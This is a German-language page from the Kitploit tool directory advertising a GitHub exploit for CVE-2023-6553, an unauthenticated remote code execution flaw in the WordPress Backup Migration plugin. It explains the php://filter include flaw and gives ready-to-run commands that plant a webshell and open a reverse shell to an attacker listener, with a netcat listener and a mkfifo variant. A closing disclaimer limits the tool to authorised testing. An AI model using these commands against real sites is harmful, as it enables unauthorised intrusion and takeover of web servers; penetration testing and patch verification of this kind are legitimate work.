Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — Dieser Exploit basiert auf CVE-2023-6553 und wurde auf dem ursprünglichen Exploit von Chocapik aufgebaut, es wurde hinzugefügt, dass eine direkte Reverse-Shell erhalten werden kann. | Kitploit
Tools/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

Dieser Exploit basiert auf CVE-2023-6553 und wurde auf dem ursprünglichen Exploit von Chocapik aufgebaut, es wurde hinzugefügt, dass eine direkte Reverse-Shell erhalten werden kann.

Repository anzeigen
15vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-6553 — Das Backup Migration Plugin für WordPress - Reverse Shell

Eine erweiterte Version von Chocapikk's CVE-2023-6553 Exploit, die einen Reverse-Shell-Modus mit einem Befehl zusätzlich zur ursprünglichen interaktiven Webshell hinzufügt.


Schwachstelle

CVE-2023-6553 — Nicht authentifizierte Remote-Code-Ausführung im Backup Migration WordPress-Plugin (Versionen ≤ 1.3.7).

Das Plugin stellt backup-heart.php bereit, das eine PHP-Filter-Kette aus dem HTTP-Header Content-Dir liest und ohne Authentifizierung oder Bereinigung an include() übergibt. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code ausführen, indem er eine manipulierte php://filter-Kette injiziert.

  • CVSS: 9.8 (Kritisch)
  • Plugin: Backup Migration ≤ 1.3.7
  • Referenz: WPScan

Danksagungen

Ursprünglicher Exploit von Chocapikk — die gesamte Kern-Exploit-Logik (Filterketten-Generierung, Dateischreiben, interaktive Shell) stammt von ihm. Dieses Repository erweitert sie lediglich um einen Reverse-Shell-Trigger-Modus.


Unterschiede zum Original

FunktionOriginal (Chocapikk)Diese Version
Interaktive Webshell✅✅ (unverändert)
Reverse Shell❌✅ (-r)
Multi-URL-Scanning✅✅ (unverändert)
Neue Argumente—-r, -l, -p, --shell

Die einzigen Ergänzungen sind:

  1. trigger_reverse_shell()-Methode — sendet nach dem Bereitstellen der Webshell (gleicher Prozess wie im Original) eine einzelne GET-Anfrage mit dem Reverse-Shell-Befehl als 0-Parameter, genau wie die interaktive Shell es tun würde.
  2. 4 neue argparse-Argumente — um den Reverse-Shell-Modus zu aktivieren und zu konfigurieren.
  3. 5 Zeilen in main() — tauscht interactive_shell() gegen trigger_reverse_shell() aus, wenn -r vorhanden ist.

Alles andere — Schwachstellenprüfung, Dateischreibschleife, Kopieren/Löschen, interaktiver Modus, Multi-URL-Scanning — bleibt unverändert vom Original.


Voraussetzungen

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

Verwendung

Reverse-Shell-Modus (neu)

root@kitploit:~
# Start your listener first
rlwrap nc -lvnp 4444

# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

Falls bash /dev/tcp auf dem Ziel nicht verfügbar ist, verwenden Sie mkfifo (nutzt stattdessen nc):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

Interaktiver Webshell-Modus (ursprüngliches Verhalten)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

Nur Schwachstellenprüfung

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

Liste von URLs scannen

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

Alle Argumente

root@kitploit:~
-u / --url      Target base URL (e.g. http://target/blog)
-r / --revshell Enable reverse shell mode
-l / --lhost    Your IP to receive the shell (required with -r)
-p / --lport    Your listener port (default: 4444)
     --shell    Shell type: bash (default) or mkfifo
-c / --check    Check vulnerability only, do not deploy shell
-f / --file     File with list of URLs to scan
-t / --threads  Threads for multi-URL scan (default: 5)
-o / --output   Output file for scan results

Funktionsweise

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<encoded PHP>
   → Writes webshell char by char to a temp file
   → Copies temp file to <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → Executes command via backtick operator
   → Interactive mode: loops reading commands from stdin
   → Reverse shell mode: sends bash/mkfifo one-liner, connects to listener

3. Cleanup: unlink(<random>.php)

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bestimmt. Verwenden Sie es nicht gegen Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen